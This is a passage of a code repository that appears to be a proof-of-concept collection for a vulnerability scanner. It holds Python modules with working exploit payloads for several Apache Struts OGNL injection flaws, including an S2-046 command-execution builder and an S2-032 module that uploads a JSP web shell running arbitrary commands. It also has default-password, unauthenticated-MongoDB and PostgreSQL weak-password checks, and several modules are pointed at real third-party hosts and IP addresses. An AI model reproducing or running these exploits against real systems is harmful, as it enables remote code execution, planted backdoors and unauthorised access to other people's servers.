176 | else:
177 | self.external_links.append(i)
178 | return self.external_links
179 |
180 | def getaction(url):
181 | import requests
182 | baseurl = url
183 | links = []
184 |
185 | resp=None
186 | try:
187 | resp = requests.get(url,timeout=20)
188 | content = resp.content
189 | baseurl = resp.url
190 |
191 | links = LinksParser(baseurl,content).get_links_internal()
192 | except:
193 | pass
194 | finally:
195 | if resp is not None:
196 | resp.close()
197 | ret=[]
198 | if len(links)>0:
199 | ret = filter(fun1, links)
200 |
201 | return ret
202 |
203 | def fun1(s):
204 | if '.action' in s or '.do' in s:
205 | return s
206 | else:
207 | return None
208 | if __name__ == "__main__":
209 | print getaction('http://www:8089/zhxxgl')
--------------------------------------------------------------------------------
/component/struts/struts032test.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | from ..t import T
4 | # from t import T
5 | import requests
6 | class P(T):
7 | def __init__(self):
8 | T.__init__(self)
9 | keywords=['struts']
10 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
11 | target_url = ''
12 | target_url = 'http://' + ip + ':' + port
13 |
14 | if productname.get('path', ''):
15 | target_url = 'http://' + ip + ':' + port + productname.get('path', '')
16 | else:
17 | from script import linktool
18 | listarray = linktool.getaction(target_url)
19 | if len(listarray) > 0:
20 | target_url = listarray[0]
21 | else:
22 | target_url = 'http://' + ip + ':' + port + '/login.action'
23 | result = {}
24 | timeout=3
25 | result['result']=False
26 | res=None
27 | payload = "method:%23_memberAccess%[email]3d@ognl.OgnlContext[/email]@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj[0]),%23w.getWriter().println(88888888-1),%23w.getWriter().flush(),%23w.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse" #
28 |
29 | print target_url
30 | try:
31 | headers = {"Content-Type":"application/x-www-form-urlencoded"}
32 | r = requests.post(target_url,data=payload,headers=headers,timeout=5)
33 | res_html = r.text
34 | except Exception,e:
35 | print e
36 | return result
37 | finally:
38 | if res is not None:
39 | res.close()
40 | del res
41 |
42 |
43 | if res_html.find("88888887") <> -1:
44 |
45 |
46 | info = target_url + "struts032 Vul"
47 | result['result']=True
48 | result['VerifyInfo'] = {}
49 | result['VerifyInfo']['type']='struts032 Vul'
50 | result['VerifyInfo']['URL'] =target_url
51 | result['VerifyInfo']['payload']=payload
52 | result['VerifyInfo']['result'] =info
53 | return result
54 | return result
55 |
56 | if __name__ == '__main__':
57 | print P().verify(ip='gimssom.bnuz.edu.cn',port='8089')
58 |
59 |
60 |
61 |
--------------------------------------------------------------------------------
/component/struts/struts045.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | # from ..t import T
4 | from t import T
5 | import requests
6 | class P(T):
7 | def __init__(self):
8 | T.__init__(self)
9 | keywords=['struts']
10 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
11 | target_url = ''
12 | target_url = 'http://' + ip + ':' + port
13 |
14 | if productname.get('path', ''):
15 | target_url = 'http://' + ip + ':' + port + productname.get('path', '')
16 | else:
17 | from script import linktool
18 | listarray = linktool.getaction(target_url)
19 | if len(listarray) > 0:
20 | target_url = listarray[0]
21 | else:
22 | target_url = 'http://' + ip + ':' + port + '/login.action'
23 |
24 | result = {}
25 | timeout=3
26 | result['result']=False
27 | res=None
28 | payload = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('123456789')).(#o.close())}"
29 | print target_url
30 | try:
31 | headers = {"Content-Type":payload}
32 | r = requests.get(target_url,headers=headers,timeout=5)
33 | res_html = r.text
34 | except Exception,e:
35 | print e
36 | return result
37 | finally:
38 | if res is not None:
39 | res.close()
40 | del res
41 |
42 | if res_html.find("123456789") <> -1:
43 |
44 |
45 | info = target_url + "struts045 Vul"
46 | result['result']=True
47 | result['VerifyInfo'] = {}
48 | result['VerifyInfo']['type']='struts045 Vul'
49 | result['VerifyInfo']['URL'] =target_url
50 | result['VerifyInfo']['payload']=payload
51 | result['VerifyInfo']['result'] =info
52 | return result
53 | return result
54 |
55 | if __name__ == '__main__':
56 | print P().verify(ip='www',port='8089')
57 |
58 |
59 |
60 |
--------------------------------------------------------------------------------
/component/struts/struts2016.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | from t import T
4 |
5 | import requests
6 | class P(T):
7 | def __init__(self):
8 | T.__init__(self)
9 | keywords=['struts']
10 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
11 | target_url=''
12 | target_url = 'http://' + ip + ':' + port
13 |
14 | if productname.get('path',''):
15 | target_url = 'http://'+ip+':'+port+productname.get('path','')
16 | else:
17 | from script import linktool
18 | listarray=linktool.getaction(target_url)
19 | if len(listarray)>0:
20 | target_url=listarray[0]
21 | else:
22 | target_url = 'http://'+ip+':'+port+'/login.action'
23 | result = {}
24 | timeout=3
25 | result['result']=False
26 | res=None
27 | payload = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}"
28 |
29 | print target_url
30 | try:
31 | headers = {"Content-Type":"application/x-www-form-urlencoded"}
32 | r = requests.post(target_url,data=payload,headers=headers,timeout=5)
33 | res_html = r.text
34 | except Exception,e:
35 | print e
36 | return result
37 | finally:
38 | if res is not None:
39 | res.close()
40 | del res
41 |
42 | if res_html.find("88888887") <> -1:
43 |
44 |
45 | info = target_url + "struts016 Vul"
46 | result['result']=True
47 | result['VerifyInfo'] = {}
48 | result['VerifyInfo']['type']='struts016 Vul'
49 | result['VerifyInfo']['URL'] =target_url
50 | result['VerifyInfo']['payload']=payload
51 | result['VerifyInfo']['result'] =info
52 | return result
53 | return result
54 |
55 | if __name__ == '__main__':
56 | print P().verify(ip='116.213.171.228',port='80')
57 |
58 |
59 |
60 |
--------------------------------------------------------------------------------
/component/struts/struts2019.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | # from ..t import T
4 | from t import T
5 | import requests
6 | class P(T):
7 | def __init__(self):
8 | T.__init__(self)
9 | keywords=['struts']
10 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
11 | target_url = ''
12 | target_url = 'http://' + ip + ':' + port
13 |
14 | if productname.get('path', ''):
15 | target_url = 'http://' + ip + ':' + port + productname.get('path', '')
16 | else:
17 | from script import linktool
18 | listarray = linktool.getaction(target_url)
19 | if len(listarray) > 0:
20 | target_url = listarray[0]
21 | else:
22 | target_url = 'http://' + ip + ':' + port + '/login.action'
23 |
24 | result = {}
25 | timeout=3
26 | result['result']=False
27 | res=None
28 | payload = "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()"
29 |
30 | print target_url
31 | try:
32 | headers = {"Content-Type":"application/x-www-form-urlencoded"}
33 | r = requests.post(target_url,data=payload,headers=headers,timeout=5)
34 | res_html = r.text
35 | except Exception,e:
36 | print e
37 | return result
38 | finally:
39 | if res is not None:
40 | res.close()
41 | del res
42 |
43 | if res_html.find("88888887") <> -1:
44 |
45 |
46 | info = target_url + "struts019 Vul"
47 | result['result']=True
48 | result['VerifyInfo'] = {}
49 | result['VerifyInfo']['type']='struts019 Vul'
50 | result['VerifyInfo']['URL'] =target_url
51 | result['VerifyInfo']['payload']=payload
52 | result['VerifyInfo']['result'] =info
53 | return result
54 | return result
55 |
56 | if __name__ == '__main__':
57 | print P().verify(ip='www',port='8089')
58 |
59 |
60 |
61 |
--------------------------------------------------------------------------------
/component/struts/struts2032.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | from ..t import T
4 | import random,urllib2
5 | class P(T):
6 | def __init__(self):
7 | T.__init__(self)
8 | keywords=['struts']
9 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
10 | target_url = ''
11 | target_url = 'http://' + ip + ':' + port
12 |
13 | if productname.get('path', ''):
14 | target_url = 'http://' + ip + ':' + port + productname.get('path', '')
15 | else:
16 | from script import linktool
17 | listarray = linktool.getaction(target_url)
18 | if len(listarray) > 0:
19 | target_url = listarray[0]
20 | else:
21 | target_url = 'http://' + ip + ':' + port + '/login.action'
22 | result = {}
23 | timeout=3
24 | result['result']=False
25 | res=None
26 | jsp_file = str(random.randint(1000, 1000000)) + '.jsp'
27 | content = 'gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.' \
28 | 'getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%2' \
29 | '0%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%' \
30 | '29.exec%28request.getParameter%28%22l%22%29%29.getInputStre' \
31 | 'am%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B' \
32 | '%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byt' \
33 | 'e%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3C' \
34 | 'pre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din' \
35 | '.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20' \
36 | '%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%2' \
37 | '0%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%' \
38 | '22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E'
39 |
40 | poc_url = "{url}?method:%23_memberAccess%3d@ognl.OgnlContext" \
41 | "@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0]," \
42 | "%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a)," \
43 | "%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23" \
44 | "fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23para" \
45 | "meters.content[0].getBytes()),%23fos.close(),%23hh%3d%23conte" \
46 | "xt.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23" \
47 | "b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23x" \
48 | "x:%23request.toString&reqobj=com.opensymphony.xwork2.dispatch" \
49 | "er.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatch" \
50 | "er.HttpServletResponse&reqobj=%2f&reqobj={filename}&content={" \
51 | "content}".format(url=target_url, filename=jsp_file, content=content)
52 | print target_url
53 | try:
54 | res=urllib2.urlopen(poc_url,timeout=timeout)
55 | res_html = res.read()
56 | except Exception,e:
57 | print e
58 | return result
59 | finally:
60 | if res is not None:
61 | res.close()
62 | del res
63 | if jsp_file in res_html:
64 | info = target_url + "struts032 Vul"
65 | result['result']=True
66 | result['VerifyInfo'] = {}
67 | result['VerifyInfo']['type']='struts032 Vul'
68 | result['VerifyInfo']['URL'] =target_url
69 | result['VerifyInfo']['payload']=poc_url
70 | result['VerifyInfo']['result'] =info
71 | return result
72 | return result
73 |
74 | if __name__ == '__main__':
75 | print P().verify(ip='www.htzai.com',port='80')
76 |
77 |
78 |
79 |
--------------------------------------------------------------------------------
/component/struts/struts2046.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | # from ..t import T
4 | from t import T
5 | import random
6 | import base64
7 | import sys
8 | import urllib2
9 | class P(T):
10 | def __init__(self):
11 | T.__init__(self)
12 | keywords=['struts']
13 | def make_s2_046_payload(self,command):
14 | payload_l = base64.decodestring(u'JXsoI25pa2U9J211bHRpcGFydC9mb3JtLWRhdGEnKS4oI2RtPUBvZ25sLk9nbmxDb250ZXh0QERFRkFVTFRfTUVNQkVSX0FDQ0VTUykuKCNfbWVtYmVyQWNjZXNzPygjX21lbWJlckFjY2Vzcz0jZG0pOigoI2NvbnRhaW5lcj0jY29udGV4dFsnY29tLm9wZW5zeW1waG9ueS54d29yazIuQWN0aW9uQ29udGV4dC5jb250YWluZXInXSkuKCNvZ25sVXRpbD0jY29udGFpbmVyLmdldEluc3RhbmNlKEBjb20ub3BlbnN5bXBob255Lnh3b3JrMi5vZ25sLk9nbmxVdGlsQGNsYXNzKSkuKCNvZ25sVXRpbC5nZXRFeGNsdWRlZFBhY2thZ2VOYW1lcygpLmNsZWFyKCkpLigjb2dubFV0aWwuZ2V0RXhjbHVkZWRDbGFzc2VzKCkuY2xlYXIoKSkuKCNjb250ZXh0LnNldE1lbWJlckFjY2VzcygjZG0pKSkpLigjY21kPSc=')
15 | payload_r = base64.decodestring(u'JykuKCNpc3dpbj0oQGphdmEubGFuZy5TeXN0ZW1AZ2V0UHJvcGVydHkoJ29zLm5hbWUnKS50b0xvd2VyQ2FzZSgpLmNvbnRhaW5zKCd3aW4nKSkpLigjY21kcz0oI2lzd2luP3snY21kLmV4ZScsJy9jJywjY21kfTp7Jy9iaW4vYmFzaCcsJy1jJywjY21kfSkpLigjcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKCNjbWRzKSkuKCNwLnJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkpLigjcHJvY2Vzcz0jcC5zdGFydCgpKS4oI3Jvcz0oQG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpLmdldE91dHB1dFN0cmVhbSgpKSkuKEBvcmcuYXBhY2hlLmNvbW1vbnMuaW8uSU9VdGlsc0Bjb3B5KCNwcm9jZXNzLmdldElucHV0U3RyZWFtKCksI3JvcykpLigjcm9zLmZsdXNoKCkpfQ==')
16 | end_null_byte = '0063'.decode('hex')
17 | payload = payload_l + command + payload_r + end_null_byte
18 | return payload
19 |
20 |
21 | def exec_s2_046_payload(self,url=None, payload=None):
22 | user_agent = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)'
23 | header_payload = 'multipart/form-data; boundary=---------------------------735323031399963166993862150'
24 | headers = {'User-Agent': user_agent,
25 | 'Content-Type': header_payload}
26 | body_payload = '''-----------------------------735323031399963166993862150\r\nContent-Disposition: form-data; name="foo"; filename="{0}"\r\nContent-Type: text/plain\r\n\r\nx\r\n-----------------------------735323031399963166993862150--'''.format(payload)
27 | response=None
28 | result=''
29 | try:
30 | req = urllib2.Request(url, headers=headers,data=body_payload)
31 | response = urllib2.urlopen(req)
32 | except Exception as e:
33 | print e
34 | else:
35 | result = response.read()
36 | finally:
37 | if response is not None:
38 | response.close()
39 | return result
40 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
41 | target_url = ''
42 | target_url = 'http://' + ip + ':' + port
43 |
44 | if productname.get('path', ''):
45 | target_url = 'http://' + ip + ':' + port + productname.get('path', '')
46 | else:
47 | from script import linktool
48 | listarray = linktool.getaction(target_url)
49 | if len(listarray) > 0:
50 | target_url = listarray[0]
51 | else:
52 | target_url = 'http://' + ip + ':' + port + '/login.action'
53 |
54 | result = {}
55 | timeout=3
56 | result['result']=False
57 | res=None
58 | s=None
59 |
60 |
61 | try:
62 | randint1 = str(random.randint(1000, 10000))
63 | payload = self.make_s2_046_payload('echo X-Test-'+randint1)
64 | temp_result = self.exec_s2_046_payload(target_url, payload)
65 |
66 | if 'X-Test-%s' % (randint1) in temp_result:
67 | info = target_url + "struts046 Vul"
68 | result['result']=True
69 | result['VerifyInfo'] = {}
70 | result['VerifyInfo']['type']='struts046 Vul'
71 | result['VerifyInfo']['URL'] =target_url
72 | result['VerifyInfo']['payload']=payload
73 | result['VerifyInfo']['result'] =info
74 | return result
75 |
76 | except Exception,e:
77 | print e
78 | return result
79 | finally:
80 | if s is not None:
81 | s.close()
82 | del s
83 |
84 |
85 |
86 | # return result
87 |
88 | if __name__ == '__main__':
89 | print P().verify(ip='www.healthmanage.cn',port='80')
90 |
--------------------------------------------------------------------------------
/component/struts/struts2devmode.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | # from ..t import T
4 | from t import T
5 | import requests
6 | class P(T):
7 | def __init__(self):
8 | T.__init__(self)
9 | keywords=['struts']
10 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
11 | target_url = ''
12 | target_url = 'http://' + ip + ':' + port
13 |
14 | if productname.get('path', ''):
15 | target_url = 'http://' + ip + ':' + port + productname.get('path', '')
16 | else:
17 | from script import linktool
18 | listarray = linktool.getaction(target_url)
19 | if len(listarray) > 0:
20 | target_url = listarray[0]
21 | else:
22 | target_url = 'http://' + ip + ':' + port + '/login.action'
23 |
24 | result = {}
25 | timeout=3
26 | result['result']=False
27 | res=None
28 | payload = "debug=browser&object=(%23mem=%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789"
29 |
30 | print target_url
31 | try:
32 | headers = {"Content-Type":"application/x-www-form-urlencoded"}
33 | r = requests.post(target_url,data=payload,headers=headers,timeout=5)
34 | res_html = r.text
35 | except Exception,e:
36 | print e
37 | return result
38 | finally:
39 | if res is not None:
40 | res.close()
41 | del res
42 |
43 | if res_html.find("123456789") <> -1:
44 |
45 |
46 | info = target_url + "strutsdevmode Vul"
47 | result['result']=True
48 | result['VerifyInfo'] = {}
49 | result['VerifyInfo']['type']='strutsdevmode Vul'
50 | result['VerifyInfo']['URL'] =target_url
51 | result['VerifyInfo']['payload']=payload
52 | result['VerifyInfo']['result'] =info
53 | return result
54 | return result
55 |
56 | if __name__ == '__main__':
57 | print P().verify(ip='www',port='8089')
58 |
59 |
60 |
61 |
--------------------------------------------------------------------------------
/component/struts/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/component/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 |
15 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
16 | ##
17 | #head 返回的请求头
18 | #context 返回请求正文html代码
19 | #ip 请求ip
20 | #port 请求端口
21 | #productname 请求的组件产品
22 | #keywords 暂时已知的关键词组件
23 | #hackinfo 备用字段
24 |
25 |
26 |
27 |
28 | return True
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/component/test/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/component/test/__init__.py
--------------------------------------------------------------------------------
/component/zebra/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['zebra', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 |
4 |
5 | if 'zebra' in port :
6 | return True
7 | else:
8 |
9 | return False
--------------------------------------------------------------------------------
/component/zebra/a.out:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/component/zebra/a.out
--------------------------------------------------------------------------------
/component/zebra/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/component/zebra/zebradefaultpass.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | from t import T
4 | import os
5 | import platform
6 | import subprocess
7 | import signal
8 | import time
9 | import requests,urllib2,json,urlparse
10 |
11 | import pexpect
12 |
13 | class P(T):
14 | def __init__(self):
15 | T.__init__(self)
16 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
17 |
18 | result = {}
19 | result['result']=False
20 | cmd=None
21 | passwd='zebra'
22 | i=0
23 | cmd = pexpect.spawn('telnet %s %s' %(ip,port) )
24 | try:
25 |
26 | i = cmd.expect(['Password:','Connection refused'], timeout=2)
27 | if i==1:
28 | return result
29 | cmd.sendline(passwd)
30 |
31 | i = cmd.expect(['Incorrect','>'], timeout=2)
32 | if i == 0:
33 | return result
34 |
35 |
36 |
37 |
38 | result['result'] = True
39 | result['VerifyInfo'] = {}
40 | result['VerifyInfo']['type'] = 'weak pass'
41 | result['VerifyInfo']['URL'] = ip + ':' + port
42 | result['VerifyInfo']['payload'] = passwd
43 | result['VerifyInfo']['result'] = 'pass is %s'% passwd
44 |
45 | except pexpect.EOF:
46 | pass
47 | except pexpect.TIMEOUT:
48 | pass
49 | finally:
50 | if cmd is not None:
51 | cmd.close()
52 | return result
53 | if __name__ == '__main__':
54 | print P().verify(ip='222.177.55.119',port='2601')
55 |
--------------------------------------------------------------------------------
/database/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/database/__init__.py
--------------------------------------------------------------------------------
/database/mongo/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['mongo', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 |
4 |
5 | if '27017' in port :
6 | return True
7 | else:
8 |
9 | return False
--------------------------------------------------------------------------------
/database/mongo/mongo_auth.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | from t import T
4 | from pymongo import MongoClient
5 | import requests,urllib2,json,urlparse
6 | class P(T):
7 | def __init__(self):
8 | T.__init__(self)
9 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
10 |
11 | result = {}
12 | result['result']=False
13 | r=None
14 | try:
15 |
16 | r = MongoClient(ip, 27017, connectTimeoutMS=1000, socketTimeoutMS=1000, waitQueueTimeoutMS=1000)
17 |
18 |
19 | serverInfo = r.server_info()
20 |
21 | dbList = r.database_names()
22 |
23 |
24 |
25 | result['result']=True
26 | result['VerifyInfo'] = {}
27 | result['VerifyInfo']['type']='MongoClient unauth'
28 | result['VerifyInfo']['URL'] =ip+':'+port
29 | result['VerifyInfo']['payload']='None'
30 | result['VerifyInfo']['result'] ='MongoClient unauth'
31 |
32 | except Exception,e:
33 | print e.text
34 | finally:
35 | if r is not None:
36 | r.close()
37 | del r
38 | return result
39 | if __name__ == '__main__':
40 | print P().verify(ip='140.114.108.4',port='80')
--------------------------------------------------------------------------------
/database/mongo/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 |
15 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
16 | ##
17 | #head 返回的请求头
18 | #context 返回请求正文html代码
19 | #ip 请求ip
20 | #port 请求端口
21 | #productname 请求的组件产品
22 | #keywords 暂时已知的关键词组件
23 | #hackinfo 备用字段
24 |
25 |
26 |
27 |
28 | return True
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/database/postgresql/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['postgresql', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 |
4 |
5 | if 'postgresql' in context or 'postgresql' in head:
6 | return True
7 | else:
8 | return False
--------------------------------------------------------------------------------
/database/postgresql/postgresql_3c99590b8794b5c7ed0693e732916e92.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | #__Author__ = DWBH
4 | # __type__ = postgresSQL md5加密方式弱口令检测
5 |
6 | import urlparse
7 | import socket
8 | import re
9 | import hashlib
10 | import struct
11 | from ..miniCurl import Curl
12 | from ..t import T
13 |
14 |
15 | def getauth(s,username,password):
16 | typeu="\x00\x03\x00\x00"
17 | user="\x75\x73\x65\x72\x00"
18 | uservalue=username+"\x00"
19 | db="\x64\x61\x74\x61\x62\x61\x73\x65\x00"
20 | dbvalue="\x00"
21 | app="\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x5F\x6E\x61\x6D\x65\x00"
22 | appvalue="psql"+"\x00"
23 | encode="\x63\x6C\x69\x65\x6E\x74\x5F\x65\x6E\x63\x6F\x64\x69\x6E\x67\x00"
24 | encodevalue="\x47\x42\x4B\x00"
25 | data=typeu+user+uservalue+db+dbvalue+app+appvalue+encode+encodevalue+"\x00"
26 | payload=struct.pack("!i",len(data)+4)+data
27 | try:
28 | s.sendall(payload)
29 | res = s.recv(1024)
30 | authtype = struct.unpack("!i",res[5:9])[0]
31 | if res[0]=="R":
32 | if authtype==0:
33 | return 'noauth',0
34 | if authtype==5:
35 | return "md5",makeauth(username,password,res[-4:])
36 | else:
37 | return "auth",struct.unpack("!i",res[5:9])[0]
38 | except:
39 | pass
40 | return "baduser",-1
41 |
42 |
43 |
44 |
45 | def md5(data):
46 | return hashlib.md5(data).hexdigest()
47 |
48 | def makeauth(username,password,key):
49 | return 'md5'+md5(md5(password+username)+key)
50 |
51 |
52 |
53 |
54 | def sendauth(s,auth):
55 | authstye="\x70\x00\x00\x00\x28"
56 | auth=authstye+auth+"\x00"
57 | try:
58 | s.sendall(auth)
59 | data=s.recv(1024)
60 | if data[0]=="R" and data[5:9]=="\x00\x00\x00\x00":
61 | return True
62 | except:
63 | pass
64 | return False
65 |
66 | def createsocket(ip,port):
67 | for x in range(10):
68 | try:
69 | s = socket.socket()
70 | s.connect((ip,port))
71 | return s
72 | except:
73 | pass
74 |
75 |
76 | class P(T):
77 | def __init__(self):
78 | T.__init__(self)
79 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
80 | args='http://'+ip+':'+port+'/'
81 | curl=Curl()
82 | result = {}
83 | result['result']=False
84 |
85 | ip,port=args
86 | baduser = []
87 | gooduser = []
88 | try:
89 | s = socket.socket()
90 | s.connect((ip,port))
91 | pass_list = util.load_password_dict(
92 | ip,
93 | userfile='database/mysql_user.txt',
94 | passfile='database/mysql_pass.txt',
95 | mix=True,
